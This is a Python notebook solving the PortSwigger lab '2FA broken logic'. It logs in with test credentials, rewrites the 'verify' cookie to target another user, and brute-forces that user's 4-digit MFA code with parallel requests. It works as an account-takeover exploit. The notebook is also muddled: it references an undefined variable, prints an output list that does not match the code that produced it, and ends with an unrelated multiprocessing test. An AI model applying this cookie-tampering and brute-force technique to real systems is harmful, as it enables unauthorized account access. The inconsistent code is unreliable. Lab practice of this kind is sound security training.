# 2FA Broken Logic
https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic

Process:
1. Login with our own account (gettin an MFA token)
2. Use the cookie with the target username to send an MFA token to them
3. Brute force their MFA token

In [3]:
import requests
from requests.cookies import cookiejar_from_dict as cfd

### 1. Login

In [9]:
URL = "https://ac521f441e47ab46c05370b70067008a.web-security-academy.net/"

my_credentials = {"username" : "wiener", "password" : "peter"}

#Post to the initial login screen (triggering the MFA token to be emailed to us)
s = requests.session()
r = s.post(URL + "login", data=my_credentials)

In [10]:
s.cookies.get_dict()

{'session': 'MZm2CrmP8ybuKaVuBN2Ju9YA5LDlizrP', 'verify': 'wiener'}

### 2. Send Target MFA Code

In [8]:
#Specify target:
target = "carlos"

#Get and modify cookies
cookies = s.cookies.get_dict()
cookies['verify'] = target

r = s.get(URL + "login2", cookies=cfd(cookies))

### 3. Brute Force MFA Token

In [23]:
from multiprocessing.pool import Pool

In [54]:
#Note, MFA Token is 4 digits

def test_MFA_code(MFA_digits, URL):
    
    MFA_code = {"mfa-code" : "{}".format(MFA_digits)} #Our MFA Code
    
    r = requests.post(URL + "login2", data=MFA_code, cookies=cfd({"verify" : target}))
    
    if f"Your username is: {target}" in r.text:
        print("Success!")
        return 1
    else:
        return 0

In [55]:
%%timeit
with Pool(processes=4) as pool:
    res = list(pool.apply(test_MFA_code, args=[x, URL]) for x in range(1111, 1121))

14.5 s ± 984 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [56]:
%%timeit
with Pool(processes=16) as pool:
    res = list(pool.apply(test_MFA_code, args=[x, URL]) for x in range(1111, 1121))

14.3 s ± 563 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [57]:
%%timeit
with Pool(processes=4) as pool:
    res = list(pool.apply_async(test_MFA_code, args=[x, URL]) for x in range(1111, 1121))
    res = [x.get() for x in res]

35.3 ms ± 3.23 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)


In [58]:
%%timeit
with Pool(processes=16) as pool:
    res = list(pool.apply_async(test_MFA_code, args=[x, URL]) for x in range(1111, 1121))
    res = [x.get() for x in res]

134 ms ± 17.8 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [59]:
res

[0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,
 0,


So the 'verify' cookie is our username, but we can change this to the target useername (`carlos`) to see if we can get in.

In [39]:
r = requests.post(URL + "login2", data = mfa_code, cookies = requests.cookies.cookiejar_from_dict(cookies))

In [42]:
r = requests.get(URL + "my-account", cookies = requests.cookies.cookiejar_from_dict(cookies))

In [41]:
def func(x):
    """
    loop through 100000 values and then return
    """
    for v in range(100000):
        pass
    
    return x
    
        
n = 100
data = range(n)

In [42]:
with Pool(processes=4) as pool:
    results = list(pool.apply(func, args=[i]) for i in data)

In [43]:
results

[0,
 1,
 2,
 3,
 4,
 5,
 6,
 7,
 8,
 9,
 10,
 11,
 12,
 13,
 14,
 15,
 16,
 17,
 18,
 19,
 20,
 21,
 22,
 23,
 24,
 25,
 26,
 27,
 28,
 29,
 30,
 31,
 32,
 33,
 34,
 35,
 36,
 37,
 38,
 39,
 40,
 41,
 42,
 43,
 44,
 45,
 46,
 47,
 48,
 49,
 50,
 51,
 52,
 53,
 54,
 55,
 56,
 57,
 58,
 59,
 60,
 61,
 62,
 63,
 64,
 65,
 66,
 67,
 68,
 69,
 70,
 71,
 72,
 73,
 74,
 75,
 76,
 77,
 78,
 79,
 80,
 81,
 82,
 83,
 84,
 85,
 86,
 87,
 88,
 89,
 90,
 91,
 92,
 93,
 94,
 95,
 96,
 97,
 98,
 99]